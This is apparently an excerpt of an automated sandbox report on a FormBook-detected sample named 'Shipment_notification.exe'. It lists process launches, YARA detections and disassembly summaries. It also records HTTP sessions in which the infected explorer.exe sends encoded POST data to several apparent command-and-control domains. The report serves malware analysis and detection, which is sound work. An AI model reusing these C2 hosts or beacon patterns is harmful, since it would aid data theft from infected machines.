                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.carcosainvest.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Ascii: uyxvg=qM8yzWTwUJABL9JYk-8DZ4M_TfyE88~D7s7N~EcZXkXkp31l~L5vU9dzKKAQppBEITr5eTAPTr05gD2MvbI7rAWCoJjiU-8RTOML~4WSNJszqul0HLeo3_CQfi(Qcs5zpXYI7wyFwJrdeq(S2aW_wVcq68FwEFWNggR_eTjdlV9MynGPIg).
                                                                              Mar 20, 2023 16:49:55.599078894 CET | 115 | IN | HTTP/1.1 404 Not Found
                                                                              Connection: close
                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                              content-type: text/html; charset=UTF-8
                                                                              link: <https://carcosainvest.com/wp-json/>; rel="https://api.w.org/"
                                                                              transfer-encoding: chunked
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              date: Mon, 20 Mar 2023 15:49:55 GMT
                                                                              server: LiteSpeed


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              4 | 192.168.2.5 | 49700 | 206.54.190.30 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:49:58.125310898 CET | 126 | OUT | GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.carcosainvest.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:49:58.301676989 CET | 127 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                              content-type: text/html; charset=UTF-8
                                                                              x-redirect-by: WordPress
                                                                              location: http://carcosainvest.com/rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA
                                                                              content-length: 0
                                                                              date: Mon, 20 Mar 2023 15:49:58 GMT
                                                                              server: LiteSpeed


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              5 | 192.168.2.5 | 49701 | 199.59.243.223 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:50:03.374115944 CET | 128 | OUT | POST /rs5b/ HTTP/1.1
                                                                              Host: www.piergitarshoes.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.piergitarshoes.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.piergitarshoes.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Ascii: uyxvg=~jzMhUSB1SlKX4pf6rc3qnTMIIaY~o~AiFG5eEJTDbFt9EKl33vuMsfUv7baDap2MLYPCQQ_Lig1sC1w0DtunzOrp2hJFioMLK4FKxHOQqmJl4DOQyFbmNg_4QP3GyqY7OhjIY94BzZLqj1dQ34HOi9DFoYr8wWT(4mQQwzbqsn7jzJY5g).
                                                                              Mar 20, 2023 16:50:03.574099064 CET | 129 | IN | HTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Mon, 20 Mar 2023 15:50:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: parking_session=78d2fda6-79af-ab0e-57f5-693bd65e7dc9; expires=Mon, 20-Mar-2023 16:05:03 GMT; Max-Age=900; path=/; HttpOnly
                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bC5E8z7aZhepQNxVi/sLuxzwnjIo5kRL8VbT4HUby+20ViRXfVasqOndIFhpS42+RxePkGsnkuvXvmghzumwkA==
                                                                              Cache-Control: no-cache
                                                                              Accept-CH: sec-ch-prefers-color-scheme
                                                                              Critical-CH: sec-ch-prefers-color-scheme
                                                                              Vary: sec-ch-prefers-color-scheme
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-store, must-revalidate
                                                                              Cache-Control: post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Content-Encoding: gzip


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              6 | 192.168.2.5 | 49702 | 199.59.243.223 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:50:05.917395115 CET | 131 | OUT | GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.piergitarshoes.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:50:06.120157957 CET | 132 | IN | HTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Mon, 20 Mar 2023 15:50:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: parking_session=72a77ed9-324c-f8b9-3fdc-c45079d6f10c; expires=Mon, 20-Mar-2023 16:05:06 GMT; Max-Age=900; path=/; HttpOnly
                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JosIWf3SlvYIx3mFpqMvziCBEH8tMzjdQpQAbU20HZ/amQCUrpnIDEaFuVLekt2tLmUCUwyXzDBSc8jzW9Nvgw==
                                                                              Cache-Control: no-cache
                                                                              Accept-CH: sec-ch-prefers-color-scheme
                                                                              Critical-CH: sec-ch-prefers-color-scheme
                                                                              Vary: sec-ch-prefers-color-scheme
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-store, must-revalidate
                                                                              Cache-Control: post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Data Ascii: 4cb<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JosIWf3SlvYIx3mFpqMvziCBEH8tMzjdQpQAbU20HZ/amQCUrpnIDEaFuVLekt2tLmUCUwyXzDBSc8jzW9Nvgw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre
                                                                              Mar 20, 2023 16:50:06.120187044 CET | 133 | IN
                                                                              Data Ascii: f="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNzJhNzdlZDktMzI0Yy1mOGI5LTNmZGMtYzQ1MDc5ZDZmMTBjIiwicGFnZV90aW1lIjoxNjc5MzI3NDA2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy
                                                                              Mar 20, 2023 16:50:06.120206118 CET | 133 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              7 | 192.168.2.5 | 49703 | 154.218.155.8 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:50:17.533485889 CET | 135 | OUT | POST /rs5b/ HTTP/1.1
                                                                              Host: www.ywtxsm.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.ywtxsm.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.ywtxsm.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Ascii: uyxvg=PG6u0UC7QNRVS2GJeE6TdHVKQcLm8iF5Khrh4p5X1h7zyQ0L(5jMVf(jtZUU2Y599Blwvh5SaY2zZsDKW9ZIZLXTMpnveuIHTIfPV3YN8fbaBmL2OENwiiiXMN4MxZnh0lb5rm9y1kVls0yiwcaAKT6yYxjBBRmQwIHdrw7CBsXA40rXfQ).
                                                                              Mar 20, 2023 16:50:17.879627943 CET | 135 | IN | HTTP/1.1 400 Bad Request
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:50:17 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: d404 Not Found0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              8 | 192.168.2.5 | 49704 | 154.218.155.8 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:50:21.020230055 CET | 136 | OUT | GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.ywtxsm.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:50:21.300268888 CET | 136 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:50:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 1.0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              9 | 192.168.2.5 | 49705 | 198.177.124.57 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:50:26.541023970 CET | 137 | OUT | POST /rs5b/ HTTP/1.1
                                                                              Host: www.peramid.xyz
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.peramid.xyz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.peramid.xyz/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Ascii: uyxvg=kNI3RMRPr-2GhBJV7kQv8el0Frswyap8WVUo8wmcptqnjE5AROEZtq7FtTNI(xDUalspn3(7VpayzljXYrL0Q5FzSmIsNxU_7-V4L6q6sapy2OeW2tFWfzZnVPMURuDA~PeL4atwnR1KyAcqj2wgWD8uCoXo3M~DAEbs7FiEheTuffTLOw).
                                                                              Mar 20, 2023 16:50:26.815551043 CET | 138 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Mar 2023 15:50:26 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Target ID:0
                                                                              Start time:16:48:46
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0x1a0000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Reputation:low

                                                                              Target ID:1
                                                                              Start time:16:48:57
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0x300000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Target ID:2
                                                                              Start time:16:48:57
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0xfc0000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              Reputation:low

                                                                              Target ID:3
                                                                              Start time:16:49:00
                                                                              Start date:20/03/2023
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff69bc80000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:4
                                                                              Start time:16:49:14
                                                                              Start date:20/03/2023
                                                                              Path:C:\Windows\SysWOW64\control.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\control.exe
                                                                              Imagebase:0x880000
                                                                              File size:114688 bytes
                                                                              MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              Reputation:high

                                                                                Execution Graph

                                                                                Execution Coverage:11.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:99
                                                                                Total number of Limit Nodes:6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 878 a7f1e8-a7f1f1 879 a7f1f3-a7f3a5 878->879 880 a7f1af-a7f1b3 878->880 908 a7f754-a7fafc 879->908 909 a7f3ab-a7f753 879->909 881 a7f1b9-a7f1c4 880->881 882 a7f1b4 call a7a028 880->882 886 a7f1c6-a7f1e0 881->886 887 a7f1e3-a7f1e7 881->887 882->881 886->887
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @}q
                                                                                • API String ID: 0-843584195
                                                                                • Opcode ID: d59c1ad1693255afd0c9137e9321c3f1363476b0c633dbf4c33aaa7785bbcbea
                                                                                • Instruction ID: e34ea74785ec29642157a1d948a539e7c66546a238c8a0f53d8ee5c150fbffa7
                                                                                • Opcode Fuzzy Hash: d59c1ad1693255afd0c9137e9321c3f1363476b0c633dbf4c33aaa7785bbcbea
                                                                                • Instruction Fuzzy Hash: 95C148B1A11B46DFD320DF65EC8A1893BB1BB86324F504318D1616F6F1DBB8264ACF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00A7C370
                                                                                • GetCurrentThread.KERNEL32 ref: 00A7C3AD
                                                                                • GetCurrentProcess.KERNEL32 ref: 00A7C3EA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A7C443
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID: @}q
                                                                                • API String ID: 2063062207-843584195
                                                                                • Opcode ID: a3dd641a5a67ec93c414bf25d34f74d728b76be8dd512f32b139412125cce86d
                                                                                • Instruction ID: 4c0329a23369629db92f78a0a947ffcdc7ebd333f250e5c2e95da04418303611
                                                                                • Opcode Fuzzy Hash: a3dd641a5a67ec93c414bf25d34f74d728b76be8dd512f32b139412125cce86d
                                                                                • Instruction Fuzzy Hash: 505135B0D002498FDB54CFAAD988BDEBBF0BF48314F24C4AEE419A7250D7745984CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00A7C370
                                                                                • GetCurrentThread.KERNEL32 ref: 00A7C3AD
                                                                                • GetCurrentProcess.KERNEL32 ref: 00A7C3EA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A7C443
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID: @}q
                                                                                • API String ID: 2063062207-843584195
                                                                                • Opcode ID: 7dba93d422394ef4488062f5a10b548af6bd75ba7a2e227983d2c84e0bd76cbe
                                                                                • Instruction ID: 46fd196d15a854e3118b5abd6667e598d01318f72bb1198432fe703f500c371c
                                                                                • Opcode Fuzzy Hash: 7dba93d422394ef4488062f5a10b548af6bd75ba7a2e227983d2c84e0bd76cbe
                                                                                • Instruction Fuzzy Hash: 795126B0D002498FDB54CFAAD948BDEBBF4BF48314F20C469E419A7350D7746984CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 664 a7a028-a7a03d call a79370 667 a7a053-a7a057 664->667 668 a7a03f 664->668 669 a7a06b-a7a0ac 667->669 670 a7a059-a7a063 667->670 717 a7a045 call a7a2a0 668->717 718 a7a045 call a7a2b0 668->718 675 a7a0ae-a7a0b6 669->675 676 a7a0b9-a7a0c7 669->676 670->669 671 a7a04b-a7a04d 671->667 672 a7a188-a7a248 671->672 712 a7a250-a7a27b GetModuleHandleW 672->712 713 a7a24a-a7a24d 672->713 675->676 677 a7a0eb-a7a0ed 676->677 678 a7a0c9-a7a0ce 676->678 682 a7a0f0-a7a0f7 677->682 680 a7a0d0-a7a0d7 call a7937c 678->680 681 a7a0d9 678->681 684 a7a0db-a7a0e9 680->684 681->684 685 a7a104-a7a10b 682->685 686 a7a0f9-a7a101 682->686 684->682 689 a7a10d-a7a115 685->689 690 a7a118-a7a121 call a7938c 685->690 686->685 689->690 695 a7a123-a7a12b 690->695 696 a7a12e-a7a133 690->696 695->696 697 a7a135-a7a13c 696->697 698 a7a151-a7a155 696->698 697->698 699 a7a13e-a7a14e call a7939c call a793ac 697->699 719 a7a158 call a7a580 698->719 720 a7a158 call a7a5a8 698->720 699->698 702 a7a15b-a7a15e 705 a7a181-a7a187 702->705 706 a7a160-a7a17e 702->706 706->705 714 a7a284-a7a298 712->714 715 a7a27d-a7a283 712->715 713->712 715->714 717->671 718->671 719->702 720->702
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7A26E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 864ebb4430e0b1962a817e957294d4d3c2605d92bd415e99e80a528df7c671cf
                                                                                • Instruction ID: 7ae1f11d88e971ed78a22125bbcdc5a0711393725dfb13535c51103c2e92370a
                                                                                • Opcode Fuzzy Hash: 864ebb4430e0b1962a817e957294d4d3c2605d92bd415e99e80a528df7c671cf
                                                                                • Instruction Fuzzy Hash: C4711570A00B059FDB64DF29D95079BBBF1BF88310F108A2EE44ADBA50D735E9468F91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 721 a75364-a75431 CreateActCtxA 723 a75433-a75439 721->723 724 a7543a-a75494 721->724 723->724 731 a75496-a75499 724->731 732 a754a3-a754a7 724->732 731->732 733 a754a9-a754b5 732->733 734 a754b8 732->734 733->734 736 a754b9 734->736 736->736
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00A75421
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 3992089a0f8a4f5e9b46e65092a0ebe3a8ff58d6b4f664e43a8a0c57b7366d6b
                                                                                • Instruction ID: 02c88db142a85c81bba75b2c35a8f5b98bb05c7eaceda5b736e95603ad59acef
                                                                                • Opcode Fuzzy Hash: 3992089a0f8a4f5e9b46e65092a0ebe3a8ff58d6b4f664e43a8a0c57b7366d6b
                                                                                • Instruction Fuzzy Hash: 8141F5B1C0061CCFDB24DFA9C8847DDBBB5BF49304F20806AD449AB251DBB56986CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 737 a73de8-a75431 CreateActCtxA 740 a75433-a75439 737->740 741 a7543a-a75494 737->741 740->741 748 a75496-a75499 741->748 749 a754a3-a754a7 741->749 748->749 750 a754a9-a754b5 749->750 751 a754b8 749->751 750->751 753 a754b9 751->753 753->753
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00A75421
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 9acf79d6b5a43d19f3a6616e200d26403817424b370da4b2582da6959caa436b
                                                                                • Instruction ID: a54b1950221e0fed3d6e29d437c6e5e5225bf27810d61598908f23e9f73f3a26
                                                                                • Opcode Fuzzy Hash: 9acf79d6b5a43d19f3a6616e200d26403817424b370da4b2582da6959caa436b
                                                                                • Instruction Fuzzy Hash: 4041C171C0061CCFDB24DFA9C9847DEBBB5BF48305F20806AD409AB251DBB56985CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 847 a7c938-a7c9d4 DuplicateHandle 848 a7c9d6-a7c9dc 847->848 849 a7c9dd-a7c9fa 847->849 848->849
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7C9C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 2a48518a44d8fcff66b641f0665b25c368eb9e1439d7a96f435844a6947ed2ac
                                                                                • Instruction ID: 5dcbb6f598f9c1399904a3b165ad3d207cf24e4ff6b80cec8fa09b2123349378
                                                                                • Opcode Fuzzy Hash: 2a48518a44d8fcff66b641f0665b25c368eb9e1439d7a96f435844a6947ed2ac
                                                                                • Instruction Fuzzy Hash: 8E21E3B6D002089FDB10CFAAD984ADEBFF4EB48324F14841AE958A7310D374A945DFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 852 a7c940-a7c9d4 DuplicateHandle 853 a7c9d6-a7c9dc 852->853 854 a7c9dd-a7c9fa 852->854 853->854
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7C9C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
